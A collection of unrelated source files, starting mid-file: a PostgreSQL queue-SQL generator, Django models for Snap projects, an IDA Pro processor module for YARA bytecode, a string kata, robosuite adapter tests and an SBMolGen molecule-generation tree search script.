FROM {queue_table} AS q
WHERE pg_try_advisory_xact_lock({lock_base} + q.lock)
ORDER BY q.seq
LIMIT 1;
IF _item IS NULL THEN
-- if no item found, exit
RETURN false;
END IF;
{indent(set_context, 2)}
IF ({table_fields(item, (foreign_column(column) for column in table.join_key))}) IS NULL THEN
-- if there is no iterator, start at the beginning
{indent(gather1, 3)}
ELSE
-- if there is an iterator, start at the iterator
{indent(gather2, 3)}
END IF;
IF _new_item IS NULL THEN
-- if the iterator was at the end, remove the queue item
DELETE FROM {queue_table} AS q
WHERE
({table_fields(SqlId("q"), local_columns + context_columns)}, q.seq)
= ({table_fields(item, local_columns + context_columns)}, _item.seq);
ELSE
-- update the queue item with the new iterator
UPDATE {queue_table} AS q
SET
{sql_list(f'{column} = (_new_item).{column}' for column in foreign_columns)},
count = _new_item.count,
seq = nextval(pg_get_serial_sequence({SqlString(str(queue_table))}, 'seq'))
WHERE
({table_fields(SqlId("q"), local_columns)}, q.seq)
= ({table_fields(item, local_columns)}, _item.seq);
END IF;
{indent(unset_context, 2)}
-- notify listeners that the queue has been updated
NOTIFY {SqlId(str(queue_table))};
RETURN true;
END;
$$
""".strip()
yield f"""
COMMENT ON FUNCTION {process_function} IS {SqlString(f"Refresh for {queue_table}")}
""".strip()
def enqueue_sql(
id: str,
context: typing.List[str],
table: JoinTable,
structure: Structure,
key_query: str,
exprs: typing.List[SqlTableExpr],
last_expr: typing.Optional[str],
):
queue_table = structure.queue_table(id)
column_names = [column.name for column in table.key] if table.key else ["_"]
local_columns = [local_column(column) for column in column_names]
context_columns = [context_column(setting) for setting in context]
if table.key:
order = (
f"ORDER BY {sql_list(SqlNumber(i + 1) for i, _ in enumerate(table.key))}"
)
else:
order = ""
if context:
settings = sql_list(
f"coalesce(current_setting({SqlString(f'context.{setting}')}, true), '')"
for setting in context
)
key_query = f"""
SELECT *, {settings}
FROM (
{indent(key_query, 1)}
) AS t
""".strip()
insert = f"""
INSERT INTO {queue_table} ({sql_list(local_columns + context_columns)})
{key_query}
{order}
ON CONFLICT ({sql_list(local_columns + context_columns)}) DO UPDATE
SET {update_excluded(foreign_column(column) for column in table.join_key)},
count = excluded.count,
seq = excluded.seq
""".strip()
query = SqlQuery(insert, expressions=exprs)
if last_expr is not None:
query.append(SqlId("_other"), last_expr)
return f"""
{query};
NOTIFY {SqlId(str(queue_table))};
""".strip()
|
66266
|
from django.db import models
from django.forms import ModelForm
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.core.validators import FileExtensionValidator
from .xmltools import analyze_file, include_sync_button
import uuid
def default_color():
return '#076AAB'
class Project(models.Model):
name = models.CharField(_("Name"), max_length=100)
picture = models.FileField(_("Picture"), null=True, blank=True)
description = models.CharField(_("Description"), max_length=200,
null=True, blank=True)
password = models.CharField(
_("Password"), max_length=50, null=True, blank=True)
pin = models.CharField(_("PIN"), max_length=6, unique=True)
id = models.UUIDField(_("Id"), primary_key=True,
default=uuid.uuid4, editable=False)
email = models.EmailField(_("Email"), null=True, blank=True)
@classmethod
    def create_and_save(cls, name, picture, description, password=None):
        proj = cls.objects.create(
            name=name, picture=picture, description=description, password=password)
proj.save()
return proj
def __str__(self):
return self.name
class Meta:
verbose_name = _("Project")
verbose_name_plural = _("Projects")
class File(models.Model):
# Format: YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]
timestamp = models.DateTimeField(
_("Timestamp"), auto_now_add=True, auto_now=False)
project = models.ForeignKey(Project, on_delete=models.CASCADE)
# https://docs.djangoproject.com/en/dev/ref/models/fields/#django.db.models.ManyToManyField.symmetrical
ancestors = models.ManyToManyField("self", symmetrical=False)
description = models.CharField(_("Description"), max_length=200,
null=True, blank=True)
number_scripts = models.IntegerField(_("number_scripts"), default=0)
number_sprites = models.IntegerField(_("number_sprites"), default=0)
    # pass the callable itself so Django evaluates the default per instance
    color = models.CharField(_("color"), max_length=7, default=default_color)
class Meta:
abstract = True
class SnapFile(File):
# validates only naming of file
file = models.FileField(_("File"), blank=True, validators=[
FileExtensionValidator(['xml', 'XML'])])
# thumbnail = models.ImageField(_("Thumbnail"), null=True, blank=True)
user = models.CharField(_("user"), max_length=30, null=True)
@classmethod
def create_and_save(cls, project, file, ancestors=None, user=None, description=''):
snap = cls.objects.create(
project=project, file=file, user=user, description=description)
        if ancestors:
snap.ancestors.set(ancestors)
snap.save()
return snap
def xml_job(self):
include_sync_button(self.get_media_path(),
proj_id=self.project.id, me=self.id)
stats = analyze_file(self.get_media_path())
self.number_scripts = stats[0]
self.number_sprites = stats[1]
self.save()
def as_dict(self):
ancestor_ids = [x.id for x in self.ancestors.all()]
file_url = settings.MEDIA_URL + str(self.file)
return {
'id': self.id,
'description': self.description,
'ancestors': ancestor_ids,
'file_url': file_url,
'timestamp': str(self.timestamp),
'number_scripts': self.number_scripts,
'number_sprites': self.number_sprites,
'color': self.color
}
def get_media_path(self):
return settings.MEDIA_URL + str(self.file)
class Meta:
verbose_name = _("SnapFile")
verbose_name_plural = _("SnapFiles")
class ProjectForm(ModelForm):
class Meta:
model = Project
fields = ['name', 'description', 'password', 'email']
labels = {
'description': _('Description (optional)'),
'password': _('Password (optional)'),
'email': _('email (optional), for restoring password and pin'),
}
class SnapFileForm(ModelForm):
class Meta:
model = SnapFile
fields = ['file', 'description']
labels = {
'file': _('File (optional)'),
'description': _('Description (optional)'),
}
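# Sketch of typical use from a view (illustrative values; uploaded_file is a
# hypothetical Django UploadedFile):
#   proj = Project.create_and_save('My project', None, 'demo', password='pw')
#   snap = SnapFile.create_and_save(proj, uploaded_file, user='alice')
#   snap.xml_job()  # counts scripts/sprites in the XML and saves the model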
|
66287
|
from idc import *
from idaapi import *
import idautils
YARA_OPERAND_SIZE = 8
YARA_RELOCATION_NULL_MAGIC = 0xfffaBADA
YARA_RELOCATION_END_MAGIC = 0xffffFFFF
UNDEFINED_MAGIC = 0xFFFABADAFABADAFF
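# Operand reader used by the opcode table below: reads the 64-bit immediate
# that follows the opcode byte, sign-extends it, and returns the advanced
# offset so several operands can be decoded in sequence.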
def read_qw(self, insn, eaoffset):
qw = get_qword(insn.ea+eaoffset)
eaoffset += 8
return SIGNEXT(qw, 64), eaoffset
opcodes = [
('OP_ADD_M', 32, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_AND', 1, 0, []),
('OP_BITWISE_AND', 5, 0, []),
('OP_BITWISE_NOT', 4, 0, []),
('OP_BITWISE_OR', 6, 0, []),
('OP_BITWISE_XOR', 7, 0, []),
('OP_CALL', 15, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_string, 'type': o_mem}]),
('OP_CLEAR_M', 31, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_CONTAINS', 40, 0, []),
('OP_COUNT', 20, 0, []),
('OP_DBL_ADD', 126, 0, []),
('OP_DBL_DIV', 129, 0, []),
('OP_DBL_EQ', 120, 0, []),
('OP_DBL_GE', 125, 0, []),
('OP_DBL_GT', 123, 0, []),
('OP_DBL_LE', 124, 0, []),
('OP_DBL_LT', 122, 0, []),
('OP_DBL_MINUS', 130, 0, []),
('OP_DBL_MUL', 128, 0, []),
('OP_DBL_NEQ', 121, 0, []),
('OP_DBL_SUB', 127, 0, []),
('OP_ENTRYPOINT', 39, 0, []),
('OP_ERROR', 0, 0, []),
('OP_FILESIZE', 38, 0, []),
('OP_FOUND', 22, 0, []),
('OP_FOUND_AT', 23, 0, []),
('OP_FOUND_IN', 24, 0, []),
('OP_HALT', 255, CF_STOP, []),
('OP_IMPORT', 42, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_string, 'type': o_mem}]),
('OP_INCR_M', 30, CF_USE1, []),
('OP_INDEX_ARRAY', 19, 0, []),
('OP_INIT_RULE', 28, CF_USE1 | CF_USE2, [{'addr': read_qw, 'dtyp': dt_qword, 'type': o_mem}, {
'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_INT16', 241, 0, []),
('OP_INT16BE', 247, 0, []),
('OP_INT32', 242, 0, []),
('OP_INT32BE', 248, 0, []),
('OP_INT8', 240, 0, []),
('OP_INT8BE', 246, 0, []),
('OP_INT_ADD', 106, 0, []),
('OP_INT_DIV', 109, 0, []),
('OP_INT_EQ', 100, 0, []),
('OP_INT_GE', 105, 0, []),
('OP_INT_GT', 103, 0, []),
('OP_INT_LE', 104, 0, []),
('OP_INT_LT', 102, 0, []),
('OP_INT_MINUS', 110, 0, []),
('OP_INT_MUL', 108, 0, []),
('OP_INT_NEQ', 101, 0, []),
('OP_INT_SUB', 107, 0, []),
('OP_INT_TO_DBL', 11, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_JFALSE', 44, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_JLE', 37, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_JNUNDEF', 36, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_JTRUE', 45, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_LENGTH', 21, 0, []),
('OP_LOOKUP_DICT', 43, 0, []),
('OP_MATCHES', 41, 0, []),
('OP_MATCH_RULE', 29, CF_USE1, [{
'addr': read_qw, 'dtyp': dt_qword, 'type': o_mem}]),
('OP_MOD', 10, 0, []),
('OP_NOP', 254, 0, []),
('OP_NOT', 3, 0, []),
('OP_OBJ_FIELD', 18, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_string, 'type': o_mem}]),
('OP_OBJ_LOAD', 16, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_string, 'type': o_mem}]),
('OP_OBJ_VALUE', 17, 0, []),
('OP_OF', 26, 0, []),
('OP_OFFSET', 25, 0, []),
('OP_OR', 2, 0, []),
('OP_POP', 14, 0, []),
('OP_POP_M', 33, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_PUSH', 13, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_PUSH_M', 34, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_PUSH_RULE', 27, CF_USE1, [{
'addr': read_qw, 'dtyp': dt_qword, 'type': o_mem}]),
('OP_SHL', 8, 0, []),
('OP_SHR', 9, 0, []),
('OP_STR_EQ', 140, 0, []),
('OP_STR_GE', 145, 0, []),
('OP_STR_GT', 143, 0, []),
('OP_STR_LE', 144, 0, []),
('OP_STR_LT', 142, 0, []),
('OP_STR_NEQ', 141, 0, []),
('OP_STR_TO_BOOL', 12, 0, []),
('OP_SWAPUNDEF', 35, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_UINT16', 244, 0, []),
('OP_UINT16BE', 250, 0, []),
('OP_UINT32', 245, 0, []),
('OP_UINT32BE', 251, 0, []),
('OP_UINT8', 243, 0, []),
('OP_UINT8BE', 249, 0, []),
]
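# Each opcode entry is (mnemonic, opcode byte, canonical feature flags,
# operand descriptors). Descriptor keys are operand attributes ('value' or
# 'addr', 'dtyp', 'type'); callable values are invoked during notify_ana()
# to decode the operand bytes.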
def SIGNEXT(x, b):
m = 1 << (b - 1)
x = x & ((1 << b) - 1)
return (x ^ m) - m
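# Worked example: SIGNEXT(0xFF, 8) == -1 and SIGNEXT(0x7F, 8) == 127, i.e.
# the value is reinterpreted as a b-bit two's-complement integer.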
class YaraProc(processor_t):
id = 0x8000 + 0x080
flag = PR_ADJSEGS | PRN_HEX
cnbits = 8
dnbits = 8
psnames = ["yara"]
plnames = ["yara"]
segreg_size = 0
instruc_start = 0
assembler = {
'header': [".rule"],
"flag": AS_NCHRE | ASH_HEXF0 | ASD_DECF0 | ASO_OCTF0 | ASB_BINF0 | AS_NOTAB,
"uflag": 0,
"name": "y-a-r-a",
"origin": ".org",
"end": ".end",
"cmnt": ";",
"ascsep": '"',
"accsep": "'",
"esccodes": "\"'",
"a_ascii": ".ascii",
"a_byte": "db",
"a_word": "dw",
"a_dword": "dd",
"a_qword": "dq",
"a_bss": "dfs %s",
"a_seg": "seg",
"a_curip": "PC",
"a_public": "",
"a_weak": "",
"a_extrn": ".extern",
"a_comdef": "",
"a_align": ".align",
"lbrace": "(",
"rbrace": ")",
"a_mod": "%",
"a_band": "&",
"a_bor": "|",
"a_xor": "^",
"a_bnot": "~",
"a_shl": "<<",
"a_shr": ">>",
"a_sizeof_fmt": "size %s",
}
def notify_auto_empty(self):
"""
        Jump to the program entry point in the disassembly view once autoanalysis has finished.
"""
ep = get_entry(get_entry_ordinal(0))
Jump(ep)
return 1
@staticmethod
def setup_reloc_references(codeseg='.text', relocseg='.reloc'):
reloc_seg = get_segm_by_name(relocseg)
code_seg = get_segm_by_name(codeseg)
reloc_references = {}
start = reloc_seg.startEA
cur = start
while cur < reloc_seg.endEA:
MakeDword(cur)
target = get_dword(cur)
if target == YARA_RELOCATION_END_MAGIC:
break
cur += 4
offset = get_dword(target)
if offset == YARA_RELOCATION_NULL_MAGIC:
patch_dword(target, 0)
else:
# true means code, otherwise data ref
reloc_references[target] = offset, code_seg.startEA <= offset < code_seg.endEA
return reloc_references
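    # The returned map is {relocated_address: (target_offset, is_code)};
    # notify_ana() consults it to promote relocated o_imm operands to o_mem.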
def emu_operand(self, op, insn, feature, opidx):
operand_ea = insn.ea+1+8*opidx
if op.type == o_mem:
dreftype = dr_R
if op.dtyp == dt_string and op.addr != 0:
dreftype = dr_T
make_ascii_string(op.addr, 0, ASCSTR_C)
add_dref(insn.ea, op.addr, dreftype)
elif op.type == o_near:
n = '@_{}'.format(op.addr if get_word(
op.addr) != 0xfffe else 'exit')
MakeNameEx(op.addr, n, SN_AUTO)
add_cref(insn.ea, op.addr, fl_JN)
elif op.type == o_imm:
if op.value == UNDEFINED_MAGIC or op.value == UNDEFINED_MAGIC & 0xFFFFffff:
# OpEnum(insn.ea, op.n, GetConstByName('YARA_CONST'))
pass # TODO: figure out how to show it
def notify_emu(self, insn):
feature = insn.get_canon_feature()
for i in range(3): # max operand count
oprnd = insn[i]
if oprnd.type == o_void:
break # no more operands
self.emu_operand(oprnd, insn, feature, i)
if not feature & CF_STOP:
add_cref(insn.ea, insn.ea + insn.size, fl_F)
return True
def notify_out_operand(self, ctx, op):
if op.type == o_near:
r = ctx.out_name_expr(op, op.addr, BADADDR)
return True
if op.type == o_imm:
# TODO: check for UNDEFINED value
ctx.out_value(op, OOFW_64) # vm operands are always qwords
return True
if op.type == o_mem:
r = ctx.out_name_expr(op, op.addr, BADADDR)
return True
return False
def notify_out_insn(self, ctx):
feature = ctx.insn.get_canon_feature()
ctx.out_mnemonic()
if feature & CF_USE1:
ctx.out_one_operand(0)
if feature & CF_USE2:
ctx.out_char(',')
ctx.out_char(' ')
ctx.out_one_operand(1)
if feature & CF_USE3:
ctx.out_char(',')
ctx.out_char(' ')
ctx.out_one_operand(2)
ctx.set_gen_cmt()
ctx.flush_outbuf()
return
    def notify_ana(self, insn):
        # One-time lazy setup: segments are not yet initialized during
        # __init__, so the relocation map is built on the first analysis call.
        if self.relocations is None:
            self.relocations = YaraProc.setup_reloc_references()
for i in range(3):
insn[i].type = o_void
insn.size = 1 # at least 1 byte
b = get_byte(insn.ea)
assert b in self.opcode_route, '@{} {:X} not recognized as opcode'.format(
insn.ea, b)
insn.itype, on, ov, of, operands = self.opcode_route[b]
if of & CF_USE1:
insn.size += YARA_OPERAND_SIZE
if of & CF_USE2:
insn.size += YARA_OPERAND_SIZE
if of & CF_USE3:
insn.size += YARA_OPERAND_SIZE
eaoffset = 1 # account for the first byte
for i, opdesc in enumerate(operands):
for k in opdesc:
v = opdesc[k]
if callable(opdesc[k]):
v, eaoffset = v(self, insn, eaoffset)
insn[i].__setattr__(k, v)
# relocated address to something
operand_ea = insn.ea+1+8*i
if operand_ea in self.relocations and insn[i].type == o_imm:
# print 'updated patch operand @', operand_ea
insn[i].type = o_mem
insn[i].addr = insn[i].value
return insn.size
def __init__(self):
processor_t.__init__(self)
self.reg_names = [
            # virtual segment registers
"CS",
"DS"
]
self.reg_first_sreg = self.reg_names.index("CS")
self.reg_code_sreg = self.reg_names.index("CS")
self.reg_last_sreg = self.reg_names.index("DS")
self.reg_data_sreg = self.reg_names.index("DS")
# required for IDA
self.instruc = [
{"name": on, "feature": of} for on, ov, of, operands in opcodes
]
self.instruc_end = len(self.instruc)
# for my convenience
self.opcode_route = {}
for i, (on, ov, of, operands) in enumerate(opcodes):
self.opcode_route[ov] = (i, on, ov, of, operands)
        self.relocations = None  # initialized lazily on the first notify_ana() call
def PROCESSOR_ENTRY():
return YaraProc()
|
66306
|
HERO = {'B': 'Batman', 'J': 'Joker', 'R': 'Robin'}
OUTPUT = '{}: {}'.format
class BatmanQuotes(object):
@staticmethod
def get_quote(quotes, hero):
for i, a in enumerate(hero):
if i == 0:
hero = HERO[a]
elif a.isdigit():
quotes = quotes[int(a)]
break
return OUTPUT(hero, quotes)
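# Worked example: the first letter picks the hero and the first digit picks
# the quote, e.g. BatmanQuotes.get_quote(['q0', 'q1', 'q2'], 'Rob1n')
# returns 'Robin: q1'.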
|
66322
|
import unittest
import numpy as np
from .softlearning_env_test import AdapterTestClass
from softlearning.environments.adapters.robosuite_adapter import (
RobosuiteAdapter)
class TestRobosuiteAdapter(unittest.TestCase, AdapterTestClass):
# TODO(hartikainen): This is a terrible way of testing the envs.
# All the envs should be tested independently.
def create_adapter(self, domain='Sawyer', task='Lift', *args, **kwargs):
return RobosuiteAdapter(
domain,
task,
*args,
**kwargs,
has_renderer=False,
has_offscreen_renderer=False,
use_camera_obs=False)
def test_environments(self):
# Make sure that all the environments are creatable
TEST_ENVIRONMENTS = [('Sawyer', 'Lift')]
def verify_reset_and_step(domain, task):
env = RobosuiteAdapter(
domain=domain,
task=task,
has_renderer=False,
has_offscreen_renderer=False,
use_camera_obs=False)
env.reset()
env.step(env.action_space.sample())
for domain, task in TEST_ENVIRONMENTS:
verify_reset_and_step(domain, task)
def test_copy_environments(self):
domain, task = 'Sawyer', 'Lift'
env_kwargs = {
"gripper_type": "TwoFingerGripper",
"table_full_size": (0.8, 0.8, 0.8)
}
env1 = self.create_adapter(domain=domain, task=task, **env_kwargs)
env1.reset()
env2 = env1.copy()
self.assertEqual(env1.observation_keys, env2.observation_keys)
for key, value in env_kwargs.items():
self.assertEqual(getattr(env1.unwrapped, key), value)
self.assertEqual(getattr(env2.unwrapped, key), value)
domain, task = 'Sawyer', 'Lift'
robosuite_adapter_kwargs = {
'observation_keys': ('joint_pos', 'joint_vel')
}
env_kwargs = {
"gripper_type": "TwoFingerGripper",
"table_full_size": (0.8, 0.8, 0.8)
}
env1 = self.create_adapter(
domain=domain, task=task, **robosuite_adapter_kwargs, **env_kwargs)
env1.reset()
env2 = env1.copy()
for key, value in robosuite_adapter_kwargs.items():
self.assertEqual(getattr(env1, key), value)
self.assertEqual(getattr(env2, key), value)
for key, value in env_kwargs.items():
self.assertEqual(getattr(env1.unwrapped, key), value)
self.assertEqual(getattr(env2.unwrapped, key), value)
def test_fails_with_invalid_environment_kwargs(self):
domain, task = 'Sawyer', 'Lift'
robosuite_adapter_kwargs = {
'observation_keys': ('joint_pos', 'invalid_key')
}
with self.assertRaises(AssertionError):
env = self.create_adapter(
domain=domain, task=task, **robosuite_adapter_kwargs)
def test_environment_kwargs(self):
env_kwargs = {
"has_renderer": False,
"has_offscreen_renderer": False,
"use_camera_obs": False,
"control_freq": 10,
"horizon": 1000
}
env = RobosuiteAdapter(
domain='Sawyer', task='Lift', **env_kwargs)
observation1, reward, done, info = env.step(env.action_space.sample())
self.assertAlmostEqual(reward, 0.0)
for key, expected_value in env_kwargs.items():
actual_value = getattr(env.unwrapped, key)
self.assertEqual(actual_value, expected_value)
    def test_render_rgb_array(self):
        env = self.create_adapter()
        with self.assertRaises(NotImplementedError):
            # Assumes the gym-style render API; 'rgb_array' is the
            # conventional mode name for offscreen frame capture.
            env.render(mode='rgb_array')
def test_render_human(self):
env = self.create_adapter()
with self.assertRaises(NotImplementedError):
env.render()
def test_fails_with_unnormalized_action_spec(self):
from robosuite.environments.sawyer_lift import SawyerLift
class UnnormalizedEnv(SawyerLift):
@property
def dof(self):
return 5
@property
def action_spec(self):
low, high = np.ones(self.dof) * -2.0, np.ones(self.dof) * 2.0
return low, high
env = UnnormalizedEnv(
has_renderer=False,
has_offscreen_renderer=False,
use_camera_obs=False)
with self.assertRaises(AssertionError):
adapter = RobosuiteAdapter(domain=None, task=None, env=env)
if __name__ == '__main__':
unittest.main()
|
66395
|
import sys
import os
# check SBMolGen_PATH setting
if os.getenv('SBMolGen_PATH') is None:
    print("SBMolGen_PATH is not defined; please set it before running!")
    sys.exit(1)
else:
SBMolGen_PATH=os.getenv('SBMolGen_PATH')
sys.path.append(SBMolGen_PATH+'/utils')
from subprocess import Popen, PIPE
from math import *
import random
import random as pr
import numpy as np
from copy import deepcopy
import itertools
import time
import math
import argparse
import subprocess
from keras.preprocessing import sequence
from rdkit import Chem
from rdkit.Chem import Draw
from rdkit.Chem import Descriptors
from load_model import loaded_model
from make_smile import zinc_data_with_bracket_original, zinc_processed_with_bracket
from add_node_type_zinc import chem_kn_simulation, make_input_smile,predict_smile,check_node_type,node_to_add,expanded_node
import yaml
class chemical:
def __init__(self):
self.position=['&']
self.num_atom=8
#self.vl=['\n', '&', 'C', '(', 'c', '1', 'o', '=', 'O', 'N', 'F', '[C@@H]',
#'n', '-', '#', 'S', 'Cl', '[O-]', '[C@H]', '[NH+]', '[C@]', 's', 'Br', '/', '[nH]', '[NH3+]',
#'[NH2+]', '[C@@]', '[N+]', '[nH+]', '\\', '[S@]', '[N-]', '[n+]', '[S@@]', '[S-]',
#'I', '[n-]', 'P', '[OH+]', '[NH-]', '[P@@H]', '[P@@]', '[PH2]', '[P@]', '[P+]', '[S+]',
#'[o+]', '[CH2-]', '[CH-]', '[SH+]', '[O+]', '[s+]', '[PH+]', '[PH]', '[S@@+]']
self.vl = ['\n', '&', 'C', '1', 'N', '[C@@H]', '2', '[C@H]', '(', '=', 'O', ')', 'S', 'c', '[S@]', '[nH]', '[O-]', '[N+]', 'n', 'F', '#', '[C@]', '[C@@]', '[S@@]', 'P', '/', '\\', 'Cl', 's', 'Br', 'o', '[NH3+]', 'I', '[n+]', '[nH+]', '3', '[N-]', '[S-]', 'B', '4', '5', '[NH+]', '[Si]', '[P@]', '[NH2+]', '[P@@]', '[N@+]', '6', '[N@@+]', '[S@@+]', '7', '8', '[P@@H]', '[n-]', '[C-]', '[P+]', '[Cu]', '[Ni]', '[Zn]', '[Au-]', '[OH+]']
def Clone(self):
st = chemical()
st.position= self.position[:]
return st
def SelectPosition(self,m):
self.position.append(m)
def Getatom(self):
return [i for i in range(self.num_atom)]
class Node:
def __init__(self, position = None, parent = None, state = None):
self.position = position
self.parentNode = parent
self.childNodes = []
self.child=None
self.wins = 0
self.visits = 0
self.nonvisited_atom=state.Getatom()
self.type_node=[]
self.depth=0
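    # UCB1 selection: each child is scored as wins/visits
    #   + c_val * sqrt(2 * ln(parent visits) / child visits),
    # and ties between maximal children are broken at random.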
def Selectnode(self):
#s = sorted(self.childNodes, key = lambda c: c.wins/c.visits + 0.8*sqrt(2*log(self.visits)/c.visits))[-1]
#s=random.choice(self.childNodes)
ucb=[]
print('UCB:')
for i in range(len(self.childNodes)):
ucb_tmp = self.childNodes[i].wins/self.childNodes[i].visits+ c_val*sqrt(2*log(self.visits)/self.childNodes[i].\
visits)
ucb.append(ucb_tmp)
print(self.childNodes[i].position, ucb_tmp,)
m = np.amax(ucb)
indices = np.nonzero(ucb == m)[0]
ind=pr.choice(indices)
s=self.childNodes[ind]
print('\n', 'index', ind, self.position, m,)
return s
def Addnode(self, m, s):
n = Node(position = m, parent = self, state = s)
self.childNodes.append(n)
def simulation(self,state):
predicted_smile=predict_smile(model,state)
input_smile=make_input_smile(predicted_smile)
logp,valid_smile,all_smile=logp_calculation(input_smile)
return logp,valid_smile,all_smile
def Update(self, result):
self.visits += 1
self.wins += result
def MCTS(root, verbose = False):
"""initialization of the chemical trees and grammar trees"""
#run_time=time.time()+3600*48
start_time = time.time()
run_time = time.time() + 3600*hours # 3600*24
rootnode = Node(state = root)
state = root.Clone()
"""----------------------------------------------------------------------"""
"""global variables used for save valid compounds and simulated compounds"""
valid_compound=[]
all_simulated_compound=[]
desired_compound=[]
max_logp=[]
desired_activity=[]
depth=[]
min_score=1000
score_distribution=[]
min_score_distribution=[]
generated_dict = {} #dictionary of generated compounds
    dict_id = 1  # this id is used to save the best docking pose
"""----------------------------------------------------------------------"""
out_f = open(output_dir, 'a')
while time.time()<=run_time:
        node = rootnode  # NOTE: 'node' is the tree node being traversed during selection,
        state = root.Clone()  # while 'state' is a fresh clone that replays the path from the root
"""selection step"""
node_pool=[]
while node.childNodes!=[]:
node = node.Selectnode()
state.SelectPosition(node.position)
print("state position:,",state.position)
if len(state.position)>= 70:
re= -1.0
while node != None:
node.Update(re)
node = node.parentNode
continue
if node.position == '\n':
re = -1.0
while node != None:
node.Update(re)
node = node.parentNode
continue
"""------------------------------------------------------------------"""
"""expansion step"""
expanded=expanded_node(model,state.position,val,loop_num_nodeExpansion)
new_compound = []
nodeadded = []
for n in range(simulation_num):
nodeadded_tmp = node_to_add(expanded, val)
all_posible=chem_kn_simulation(model,state.position,val,nodeadded_tmp)
generate_smile=predict_smile(all_posible,val)
new_compound_tmp = make_input_smile(generate_smile)
nodeadded.extend(nodeadded_tmp)
new_compound.extend(new_compound_tmp)
print('nodeadded', nodeadded)
print('new compound', new_compound)
print('generated_dict', generated_dict)
print('dict_id', dict_id)
for comp in new_compound:
print('lastcomp', comp[-1], ' ... ',comp[-1] == '\n')
node_index,rdock_score,valid_smile,generated_dict = check_node_type(new_compound, score_type, generated_dict, sa_threshold = sa_threshold, rule = rule5, radical = radical_check, docking_num = docking_num, target_dir = target_dir, hashimoto_filter = hashimoto_filter, dict_id = dict_id, trial = trial)
valid_compound.extend(valid_smile)
score_distribution.extend(rdock_score)
print('node', node_index, 'rdock_score', rdock_score, 'valid', valid_smile)
#out_f = open(output_dir, 'a')
#out_f.write(str(valid_smile) + ', '+ str(rdock_score)+', '+str(min_score)+', '+str(len(state.position)))
out_f.write(str(valid_smile) + ', '+ str(rdock_score)+', '+str(min_score)+', '+str(len(state.position))+', '+str(time.time()-start_time))
out_f.write('\n')
out_f.flush()
#out_f.close()
dict_id += 1
if len(node_index)==0:
re=-1.0
while node != None:
node.Update(re)
node = node.parentNode
else:
re_list = []
#atom_list = [nodeadded[m] for m in node_index]
atom_checked = []
for i in range(len(node_index)):
m=node_index[i]
atom = nodeadded[m]
if atom not in atom_checked:
node.Addnode(atom, state)
node_pool.append(node.childNodes[len(atom_checked)])
depth.append(len(state.position))
atom_checked.append(atom)
else:
node_pool.append(node.childNodes[atom_checked.index(atom)])
#node.Addnode(nodeadded[m],state)
#node.Addnode(nodeadded[m],state)
#print valid_smile[i], 'node m', m, 'nodeadded[m]', nodeadded[m], 'node.childNodes[i]', node.childNodes[i]
for child in node.childNodes:
print(child.position)
print('\n')
#node_pool.append(node.childNodes[i])
#depth.append(len(state.position))
score_index = 0 if score_type == 'SCORE' else 1
print("current minmum score",min_score)
if rdock_score[i][score_index]<=min_score:
min_score_distribution.append(rdock_score[i][score_index])
min_score=rdock_score[i][score_index]
else:
min_score_distribution.append(min_score)
"""simulation"""
if atom == '\n':
re = -1
else:
#re=(- (rdock_score[i][score_index] + 20)*0.1)/(1+abs(rdock_score[i][score_index] + 20)*0.1)
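                        # Reward shaping: docking scores below base_rdock_score (i.e. better
                        # poses) yield a positive reward, and the x/(1+|x|) squashing bounds
                        # the backpropagated value to (-1, 1).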
re=(- (rdock_score[i][score_index] - base_rdock_score)*0.1)/(1+abs(rdock_score[i][score_index] -base_rdock_score)*0.1)
                        #### pj16 reward function:
#base_rdock_score = -20
#reward = (np.tanh(0.1*(abs(rdock_score[max_index])+base_rdock_score)) + 1)/2
re_list.append(re)
print('atom', atom, 're_list', re_list)
#re=(- (rdock_score[i]/100))/(1+abs(rdock_score[i]/100))
"""backpropation step"""
for i in range(len(node_pool)):
node=node_pool[i]
while node != None:
node.Update(re_list[i])
node = node.parentNode
for child in node_pool:
print(child.position, child.wins, child.visits)
out_f.close()
"""check if found the desired compound"""
#print "all valid compounds:",valid_compound
#print "all active compounds:",desired_compound
print("rdock_score",score_distribution)
print("num valid_compound:",len(valid_compound))
print("valid compounds",valid_compound)
print("depth",depth)
print("min_score",min_score_distribution)
return valid_compound
def UCTchemical():
one_search_start_time=time.time()
time_out=one_search_start_time+60*10
state = chemical()
best = MCTS(root = state,verbose = False)
return best
if __name__ == "__main__":
# set parameter
argvs = sys.argv
"""read yaml file for configuration"""
f = open(str(argvs[1]), "r+")
conf = yaml.load(f, Loader=yaml.SafeLoader)
f.close()
trial = conf.get('trial', 1)
c_val = conf.get('c_val', 1.0)
loop_num_nodeExpansion = conf.get('loop_num_nodeExpansion', 1000)
target = conf.get('target', 'CDK2')
target_dir = conf.get('target_path', './')
hours = conf.get('hours', 1)
score_type = conf.get('score_type', 'SCORE.INTER') #<SCORE> or <SCORE.INTER>
docking_num = conf.get('docking_num', 10)
    sa_threshold = conf.get('sa_threshold', 3.5) # if SA > sa_threshold, score = 0 (default 3.5)
#RO5: if a compound does not satisfy rule of 5, score = 0.
rule5 = conf.get('rule5', 1) #0:none, 1: rule of 5, 2: rule of 3
radical_check = conf.get('radical_check', True)
simulation_num = conf.get('simulation_num', 3)
hashimoto_filter = conf.get('hashimoto_filter', True) # or False, use/not use hashimoto filter
